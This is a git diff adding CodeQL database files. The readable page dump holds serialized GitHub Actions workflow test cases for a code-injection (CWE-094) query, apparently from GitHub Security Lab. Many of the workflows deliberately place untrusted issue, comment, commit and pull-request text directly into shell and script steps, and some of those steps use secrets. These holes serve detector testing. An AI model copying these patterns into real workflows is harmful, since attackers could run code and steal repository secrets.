zzDikhTm*6wGNUIa!g}x^pSdGSU?cclbh_bJnCeVA_2#4C9G=e@$5qL})PE_h>F4Ia zbnS{B^}ZmOuHDyZ`R^H)<6Se?qZ!7lmXmfIq9bjCpK;;JhGiPIySqhK+( z@pAgn1b7f!94!!%0*{A9trA}r!!(X!je0^QOy@@Ojnlgy!gSxAOPeyC=JM(py-c9j z2VRA^)%<(0b#MeMQnVm${yg40eNB*`^m>@;KV?xb7S7yJ->;qoiy;2yVXWvOn9j+t zmLSP27H>y98&*Z!ChKzJ9hk=1qp`;KDf5ed&z=t~-@rXu^ear`%)98S{1c{g^`w_i z^@RDnxeI$O$uNTHzHc$U87u^QY71~v;gN9T%$sJ;Fx^Yov!G`kv+Ty*17Ywu#P^ol zFFy{8!6Fzlm*t!j&hNj;Jd%48*8uND&L4|~OPAX5el8HN9qhIWrfXBwR#HBT1?v@=1tF%=TO#5WXcG>GyFkXe+TrUNA0ejwa9Tlc8XbIzJ;u>ww zA@8+9&Il8+Ol+!1-w0Z^p<$38B942W$u4NVCuuv^8#ErybT`bb>wR= zyaA4zaCY-b98grJl)b9$T38$&h@6xb2oHw)YeWBp!nF6cPn*a^z|`lJ`lm&rVF_3_ zWm{bmOyj&i?pKrw)3uq}NgbIm?Mcfg!(4M<>cf>*m(_(ZjniS5ELsB7_%^BdzQp2D zM{`6gVe03efTa8fFx94VbRh3JEDIZ@8exKhW-W=mG$Cof& z8+GJR-8-22UwhebWDh(Veq~>TI9Y3EQNUSz_w}j zFx8wGWWqVXG?xJFKf=y1&G)5k^I3P8_FLfBJD)Z&m;XFz5(U$>_Z>{Qy)eB)x8Gi9 zn8|Vk*9BBxVs0HaMZFTH_vZJ-W2>IS)MvGgUoW=8)Mrj-zQsG3YH&IGOXL$w&r6BE zon|jgb6NG%M^ey{ci&eHx|}FX-`NVLY`LHYQ=KjyiZVvbIp$f~*6>ioa|6RJJF)oo z>wn%L#Q(+b0KWtL4)8m`?*P98{0{It!0!OR1N;u~JHYP%zXSXZ@H@co0KWtL4)8m` e?*P98{0{It!0!OR1N;u~JHYP%zXSizI`Ds=z%tSR literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/0/pageDump/page-000000000 b/db/db-yaml/default/pools/0/pageDump/page-000000000 new file mode 100644 index 00000000000..e8abb81542c --- /dev/null +++ b/db/db-yaml/default/pools/0/pageDump/page-000000000 @@ -0,0 +1,55 @@ +/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/Users/pwntester/src/github.com/githubsecuritylab/Users/pwntester/src/github.com/Users/pwntester/src/Users/pwntester/Users/nametag:yaml.org,2002:strIssue Workflowontag:yaml.org,2002:boolissuestypesopenededitedtag:yaml.org,2002:seq[opened, edited]tag:yaml.org,2002:maptypes: ... edited]issues:jobsredirectIssueruns-onubuntu-latestCheck for issue transferCheck f ... ransferenvcontent_analysis_responsecontent ... esponseundefinedcontent ... definedstepsusesactions/checkout@v2uses: a ... kout@v2Remove conflicting charsRemove ... g charsISSUE_TITLE${{github.event.issue.title}}${{gith ... title}}ISSUE_T ... title}}frabert/replace-string-action@1.2frabert ... ion@1.2idremove_quotationswithpattern""\""string${{env.ISSUE_TITLE}}replace-with-"-"pattern: "\""name: R ... g charsCheck infocheck-inforunecho "foo $(pwsh bar ${{steps.remove_quotations.outputs.replaced}}) " >> $GITHUB_ENV +|name: Check info- uses: ... kout@v2runs-on ... -latestredirectIssue:name: Issue Workflow/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.ymlCIpull_requestbranchesmain- mainbranches:pull_request:changed_filesTest changed-filesactions/checkout@v4fetch-depth0tag:yaml.org,2002:intfetch-depth: 0uses: a ... kout@v4Get changed fileschanged-filestj-actions/changed-files@v40tj-acti ... les@v40name: G ... d filesList all changed filesList al ... d filesfor file in ${{ steps.changed-files.outputs.all_changed_files }}; do + echo "$file was changed" +done +name: L ... d files- uses: ... kout@v4changed_files:name: CI/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.ymlissue_commentecho-chamberecho '${{ github.event.comment.body }}' +run: |- run: |echo-chamber2echo '${{ github.event.comment.body }}'echo '$ ... ody }}'run: ec ... ody }}'echo '${{ github.event.issue.body }}'echo '${{ github.event.issue.title }}'echo '$ ... tle }}'run: ec ... tle }}'- run: ... ody }}'echo-chamber3actions/github-script@v3actions ... ript@v3scriptconsole.log('${{ github.event.comment.body }}')console ... dy }}')script: ... dy }}')uses: a ... ript@v3console.log('${{ github.event.issue.body }}')console.log('${{ github.event.issue.title }}')console ... le }}')script: ... le }}')- uses: ... ript@v3echo-chamber:on: issue_comment/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml[opened,edited]permissions{}ISSUE_BODY${{github.event.issue.body}}${{gith ... .body}}outputsresult${{env.content_analysis_response}}${{env. ... ponse}}result: ... ponse}}Check Issue Titleactions-ecosystem/action-regex-match@v2actions ... atch@v2regex-matchtextregex^[A-Za-z0-9 _.]*$'^[A-Za-z0-9 _.]*$'flagsgtext: $ ... title}}name: C ... e TitleExit Jobif${{ steps.regex-match.outputs.match == '' }}${{ ste ... = '' }}echo "Bad Issue Title Format" +exit 1 +name: Exit Jobfrabert/replace-string-action@v2.5frabert ... on@v2.5'-'Check InformationISSUE_TITLE_PARSED${{steps.remove_quotations.outputs.replaced}}${{step ... laced}}ISSUE_T ... laced}}echo "content_analysis_response=$(pwsh .\\.github\\scripts\\title_analyzer.ps1)" >> $GITHUB_ENV +name: C ... rmationLabel issueenv.content_analysis_response != 'Valid'env.con ... 'Valid'curl -v -u admin:${{ secrets.DYNAMOBOTTOKEN }} -d '{"labels": ["${{env.content_analysis_response}}"]}' ${{ github.event.issue.url }}/labels +name: Label issuename: C ... ransfercheckIssueInformationcheckIs ... rmationneeds.redirectIssue.outputs.result == 'Valid'needs.r ... 'Valid'Check for missing informationCheck f ... rmationneedsanalysis_responsegreetings_commentThank you for submitting the issue to us. We are sorry to see you get stuck with your workflow. While waiting for our team member to respond, please feel free to browse our forum at https://forum.dynamobim.com/ for more Dynamo related information."Thank ... orry tocomment_introHello ${{ github.actor }}, thank you for submitting this issue! We are super excited that you want to help us make Dynamo all that it can be."Hello ... issue! needs_more_info_commentneeds_m ... commentHowever, we need some more information in order for the Dynamo team to investigate any further.\n\n"Howeve ... Dynamoclose_issue_commentHowever, given that there has been no additional information added, this issue will be closed for now. Please reopen and provide additional information if you wish the Dynamo team to investigate further.\n\n"Howeve ... added, info_neededAdditional information:\n - Filling in of the provided Template (What did you do, What did you expect to see, What did you see instead, What packages or external references (if any) were used)\n - Attaching the Stack Trace (Error message that shows up when Dynamo crashes - You can copy and paste this into the Github Issue)\n - Upload a .DYN file that showcases the issue in action and any additional needed files, such as Revit (Note: If you cannot share a project, you can recreate this in a quick mock-up file)\n - Upload a Screenshot of the error messages you see (Hover over the offending node and showcase said errors message in the screenshot)\n - Reproducible steps on how to create the error in question."Additi ... ion:\\nspecific_infoCan you please fill in the following to the best of your ability:"Can yo ... ility:"templateISSUE_TEMPLATE.md"ISSUE_TEMPLATE.md"issue_labelneeds more infoacceptable_missing_infoaccepta ... ng_info1analysi ... definedISSUE_B ... .body}}${{env.ISSUE_BODY}}${{ steps.remove_quotations.outputs.replaced }}${{ ste ... aced }}ISSUE_B ... aced }}echo "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}" )" >> $GITHUB_ENV +Close issueenv.analysis_response == 'Empty'env.ana ... 'Empty'curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.close_issue_comment}} ${{env.info_needed}}"}' ${{ github.event.issue.url }}/comments +curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X PATCH -d '{"state": "closed"}' ${{ github.event.issue.url }} +name: Close issueLabel and comment issueLabel a ... t issue((env.analysis_response != 'Valid') && (env.analysis_response != 'Empty') && (github.event.action == 'opened'))((env.a ... ened'))curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"labels": ["${{env.issue_label}}"]}' ${{ github.event.issue.url }}/labels +curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.needs_more_info_comment}} ${{env.specific_info}} ${{env.analysis_response}}.\n\n${{env.info_needed}}"}' ${{ github.event.issue.url }}/comments +name: L ... t issueUnlabel updated issueUnlabel ... d issueenv.analysis_response == 'Valid' && github.event.action == 'edited'env.ana ... edited'echo urldecode ${{env.issue_label}} +curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X DELETE ${{ github.event.issue.url }}/labels/$(echo -ne "${{env.issue_label}}" | xxd -plain | tr -d '\n' | sed 's/\(..\)/%\1/g') +name: U ... d issueGreetingsenv.analysis_response == 'Valid' && github.event.action == 'opened'env.ana ... opened'curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.greetings_comment}}"}' ${{ github.event.issue.url }}/comments +name: Greetingsif: nee ... 'Valid'/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.ymlIssue Type Predicterissue_type_Predicterparsed_issue_bodyissue_json_stringis_wish_listCheckout Dynamo Reponame: C ... mo RepoRemove Quotesremove_quotes${{ github.event.issue.body }}${{ git ... body }}ISSUE_B ... body }}${{ env.ISSUE_BODY }}${{ env ... BODY }}name: Remove QuotesAnalyze Issue Body${{ steps.remove_quotes.outputs.replaced }}echo "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}")" >> $GITHUB_ENV +name: A ... ue BodyClean Issue Bodyenv.analysis_response == 'Valid'env.ana ... 'Valid'ISSUE_BODY_PARSEDecho "parsed_issue_body="$(pwsh .\\.github\\scripts\\issue_body_cleaner.ps1 )"" >> $GITHUB_ENV +name: C ... ue BodyCreate Issue JSON StringCreate ... StringISSUE_NUMBER${{ github.event.issue.number }}${{ git ... mber }}${{ github.event.issue.title }}${{ git ... itle }}ISSUE_N ... mber }}echo "issue_json_string="$(pwsh .\\.github\\scripts\\get_issue_json_body.ps1 "$ISSUE_NUMBER")"" >> $GITHUB_ENV +name: C ... StringCheckout IssuesTypePredicter RepoCheckou ... er ReporepositoryDynamoDS/IssuesTypePredicterDynamoD ... edicterpathIssuesTypePredicterreposit ... edictername: C ... er RepoSetup dotnetactions/setup-dotnet@v4actions ... tnet@v4dotnet-version3.1.0'3.1.0'dotnet- ... '3.1.0'name: Setup dotnetBuild Issues Type PredicterBuild I ... edicterdotnet build ./IssuesTypePredicter/IssuesTypePredicter.sln --configuration Release +cp ./IssuesTypePredicter/IssuesTypePredicterML.ConsoleApp/bin/Release/netcoreapp3.1/MLModel.zip . +name: B ... edicterRun Issues Type PredicterRun Iss ... edicterecho "is_wish_list="$(dotnet run -p ./IssuesTypePredicter/IssuesTypePredicterML.ConsoleApp/IssuesTypePredicterML.ConsoleApp.csproj -v q "${{ env.issue_json_string }}")"" >> $GITHUB_ENV +name: R ... edicterLabel issue as 'Wishlist'Label i ... shlist'env.analysis_response == 'Valid' && contains(env.is_wish_list, 'IsWishlist:1')env.ana ... ist:1')GH_TOKEN${{ secrets.DYNAMO_ISSUES_TOKEN }}${{ sec ... OKEN }}GH_TOKE ... OKEN }}gh issue edit ${{ github.event.issue.number }} --add-label "Wishlist" --repo ${{ github.repository }} +name: L ... shlist'Label issue as 'NotMLEvaluated'Label i ... luated'env.analysis_response != 'Valid' || env.issue_json_string == ''env.ana ... g == ''gh issue edit ${{ github.event.issue.number }} --add-label "NotMLEvaluated" --repo ${{ github.repository }} +name: L ... luated'- name: ... mo Reponame: I ... edicterissue_t ... dicter:/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.ymlCherry pickingpushmaster- masterpush:cherry_pickdestination_branchinvalid'invalid'auto_branchauto-${{github.event.after}}'auto-$ ... fter}}'user_nameDynamo-Bot"Dynamo-Bot"destina ... nvalid'checkoutactions/checkout@v3name: checkoutfrabert/replace-string-action@v1.2frabert ... on@v1.2${{github.event.commits[0].message}}${{gith ... ssage}}ISSUE_B ... laced}}echo "destination_branch=$(pwsh .\\.github\\scripts\\cherry_pick_check.ps1 "${{ env.ISSUE_BODY_PARSED }}" )" >> $GITHUB_ENV +env.destination_branch != 'invalid'env.des ... nvalid'Create PR to branchgit config user.name "${{env.user_name}}" +git fetch --all +git checkout -b ${{env.auto_branch}} origin/${{env.destination_branch}} +git cherry-pick -x ${{github.event.after}} --strategy-option theirs +git push -u origin ${{env.auto_branch}} +hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}" +GITHUB_TOKEN${{secrets.DYNAMOBOTTOKEN}}${{secr ... TOKEN}}pr_messageCherry-Pick from commit: ${{github.event.after}} + +### Cherry-picking: +[Commit](https://github.com/DynamoDS/Dynamo/commit/${{github.event.after}}) + +### Pull request: +${{ env.ISSUE_BODY_PARSED }} +GITHUB_ ... TOKEN}}if: env ... nvalid'- name: checkoutcherry_pick:name: Cherry picking/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.ymldiscussionecho '${{ github.event.discussion.title }}'echo '${{ github.event.discussion.body }}'- run: ... tle }}'on: discussion/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.ymldiscussion_commenton: dis ... comment/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.ymlgollumecho '${{ github.event.pages[1].title }}'echo '${{ github.event.pages[11].title }}'echo '${{ github.event.pages[0].page_name }}'echo '$ ... ame }}'run: ec ... ame }}'echo '${{ github.event.pages[2222].page_name }}'echo '${{ toJSON(github.event.pages.*.title) }}'echo '$ ... le) }}'run: ec ... # safeon: gollum/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.ymlImage URL Processingcreated[created]types: [created]issue_comment:process-image-urlcontains(github.event.comment.body, 'https://github.com/github/release-assets/assets/')contain ... sets/')Checkoutname: CheckoutExtract and Clean Initial URLExtract ... ial URLextract-urlBODY${{ github.event.comment.body }}BODY: $ ... body }}echo "::set-output name=initial_url::$BODY" +name: E ... ial URLGet Redirected URL with DebuggingGet Red ... buggingcurlINITIAL_URL${{ steps.extract-url.outputs.initial_url }}${{ ste ... _url }}INITIAL ... _url }}echo "redirected_url=$(echo $INITIAL_URL)" >> $GITHUB_OUTPUT +name: G ... buggingTrim URL after PNGtrim-urlREDIRECTED_URL${{ steps.curl.outputs.redirected_url }}REDIREC ... _url }}echo "trimmed_url=$(echo $REDIRECTED_URL)" >> "$GITHUB_OUTPUT" +name: T ... ter PNGUpdate Comment with New URLUpdate ... New URLNEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" +name: U ... New URL- name: Checkoutprocess-image-url:name: I ... cessing/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.ymljob1job_output${{ steps.step.outputs.value }}${{ ste ... alue }}job_out ... alue }}sourceRemove foo from changed filesRemove ... d filesstepmad9000/actions-find-and-replace-string@3mad9000 ... tring@3${{ steps.source.outputs.all_changed_files }}${{ ste ... iles }}findfoo'foo'replace''source: ... iles }}name: R ... d filesjob2${{ always() }}sinkecho ${{needs.job1.outputs.job_output}}echo ${ ... utput}}id: sink- id: sinkjob1:on: push/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yamlglobal_envtestglobal_ ... itle }}job_envjob_env ... itle }}echo '${{ env.global_env }}'echo '$ ... env }}'run: ec ... env }}'echo '${{ env.test }}'echo '$ ... est }}'run: ec ... est }}'echo '${{ env.job_env }}'echo '${{ env.step_env }}'step_envstep_en ... itle }}env:on: issues/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.ymlCodeQL Auto Language"CodeQL ... nguage"[ main ]branches: [ main ]schedulecron17 19 * * 6'17 19 * * 6'cron: '17 19 * * 6'- cron: ... * * 6'create-matrixmatrix${{ steps.set-matrix.outputs.all_changed_files }}matrix: ... iles }}set-matrix- name: ... d filesanalyze${{ needs.create-matrix.outputs.matrix != '[]' }}${{ nee ... '[]' }}Analyzeactionsreadcontentssecurity-eventswriteactions: readstrategyfail-fastfalselanguage${{ fromJSON(needs.create-matrix.outputs.matrix) }}${{ fro ... rix) }}languag ... rix) }}fail-fast: falseCheckout repositoryname: C ... ository${{ matrix.language }} +| run: | - name: ... ositoryneeds: create-matrixcreate-matrix:name: " ... nguage"/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.ymlsimple1${{ github.event.head_commit.message }}${{ git ... sage }}source: ... sage }}id: source no-stepecho "test=foo" >> "$GITHUB_OUTPUT"echo "t ... OUTPUT"id: no-stepecho "echo ${{steps.no-step.outputs.foo}}" +- id: source simple1:/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.ymlfoobarfoo'foobarfoo'source: 'foobarfoo'for file in ${{ steps.step.outputs.value }}; do + echo "$file was changed" +done +/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.ymlpull_request_reviewecho '${{ github.event.pull_request.title }}'echo '${{ github.event.pull_request.body }}'echo '${{ github.event.pull_request.head.label }}'echo '$ ... bel }}'run: ec ... bel }}'echo '${{ github.event.pull_request.head.repo.default_branch }}'echo '$ ... nch }}'run: ec ... nch }}'echo '${{ github.event.pull_request.head.repo.description }}'echo '$ ... ion }}'run: ec ... ion }}'echo '${{ github.event.pull_request.head.repo.homepage }}'echo '$ ... age }}'run: ec ... age }}'echo '${{ github.event.pull_request.head.ref }}'echo '$ ... ref }}'run: ec ... ref }}'echo '${{ github.event.review.body }}'on: pul ... _review/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.ymlpull_request_review_commentpull_re ... commenton: pul ... comment/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.ymlpull_request_targetrun: ec ... definedecho '${{ github.head_ref }}'- run: ... definedon: pul ... _target/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.ymlecho '${{ github.event.commits[11].message }}'echo '${{ github.event.commits[11].author.email }}'echo '$ ... ail }}'run: ec ... ail }}'echo '${{ github.event.commits[11].author.name }}'echo '${{ github.event.head_commit.message }}'echo '${{ github.event.head_commit.author.email }}'echo '${{ github.event.head_commit.author.name }}'echo '${{ github.event.head_commit.committer.email }}'echo '${{ github.event.head_commit.committer.name }}'echo '${{ github.event.commits[11].committer.email }}'echo '${{ github.event.commits[11].committer.name }}'- run: ... age }}'/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.ymlsummaryid: summaryflowecho "${{steps.summary.outputs.value}}" +id: flow no-flowecho "${{steps.summary.outputs.foo}}" +id: no-flow- id: summary/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml[pull_r ... equest]for file in ${{ steps.source.outputs.all_changed_files_count }}; do + echo "$file was changed" +done +/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml${{ steps.step2.outputs.test }}${{ ste ... test }}job_out ... test }}step0id: step0 step1${{ steps.step0.outputs.value}}${{ ste ... value}}BODY: $ ... value}}shellpowershellWrite-Output "::set-output name=MSG::$ENV{BODY}" +id: step1step2MSG${{steps.step1.outputs.MSG}}${{step ... s.MSG}}MSG: ${ ... s.MSG}}echo "test=$MSG" >> "$GITHUB_OUTPUT"id: step2run: ec ... utput}}- run: ... utput}}/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.ymlworkflow_runworkflows[test]workflows: [test]workflow_run:echo '${{ github.event.workflow_run.display_title }}'echo '${{ github.event.workflow_run.head_commit.message }}'echo '${{ github.event.workflow_run.head_commit.author.email }}'echo '${{ github.event.workflow_run.head_commit.author.name }}'echo '${{ github.event.workflow_run.head_commit.committer.email }}'echo '${{ github.event.workflow_run.head_commit.committer.name }}'echo '${{ github.event.workflow_run.head_branch }}'echo '${{ github.event.workflow_run.head_repository.description }}'on:/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1/action.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1'test'descriptionbrandingiconcoloricon: 'test'inputsrequireddefaultdescription: testtest:runsusingcomposite"composite"using: "composite"name: 'test'/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2/action.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2Hello World'Hello World'Greet someone and record the time'Greet ... e time'who-to-greetWho to greet'Who to greet'trueWorld'World'descrip ... greet'who-to- ... f inputtimeThe time we greeted you'The ti ... ed you'descrip ... ed you'time: # id of outputdocker'docker'imageDockerfile'Dockerfile'args${{ inputs.who-to-greet }}${{ inp ... reet }}- ${{ i ... reet }}using: 'docker'name: 'Hello World'hSt¹>w \ No newline at end of file diff --git a/db/db-yaml/default/pools/1/buckets/info b/db/db-yaml/default/pools/1/buckets/info new file mode 100644 index 0000000000000000000000000000000000000000..0111728636533e2c31d7b0489e64f46bcd4d6cf2 GIT binary patch literal 40 ecmZQz00Tw{#Q>$5|AY89zRa8gqUTSZdItbEj0T|q literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/1/buckets/page-000000 b/db/db-yaml/default/pools/1/buckets/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa GIT binary patch literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/1/ids1/info b/db/db-yaml/default/pools/1/ids1/info new file mode 100644 index 0000000000000000000000000000000000000000..799471fd4d54d409c98d3b7826deaac67913dc99 GIT binary patch literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/1/indices1/info b/db/db-yaml/default/pools/1/indices1/info new file mode 100644 index 0000000000000000000000000000000000000000..799471fd4d54d409c98d3b7826deaac67913dc99 GIT binary patch literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/1/info b/db/db-yaml/default/pools/1/info new file mode 100644 index 0000000000000000000000000000000000000000..9b4ec24220f77cd70a002420d93e390bfc4c1f7a GIT binary patch literal 41 ccmZQz00U+q$+QN785kjAU>eL`E;&&F04bXS)Bpeg literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/1/metadata/info b/db/db-yaml/default/pools/1/metadata/info new file mode 100644 index 0000000000000000000000000000000000000000..9cdb710dfd9490f67f5103cbab69eb12829f96b4 GIT binary patch literal 40 ecmZQz00Tw{#lZL<3PAiDUuI4L(W_e5uLA(d%ME}4 literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/1/metadata/page-000000 b/db/db-yaml/default/pools/1/metadata/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa GIT binary patch literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/1/pageDump/page-000000000 b/db/db-yaml/default/pools/1/pageDump/page-000000000 new file mode 100644 index 0000000000000000000000000000000000000000..7bccaeb20c898fd660036bab54ae98c20280d0a3 GIT binary patch literal 1048592 zcmeIuF%bYT48*X95C8>I#^n|iy>Q4V1Mr|k1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs 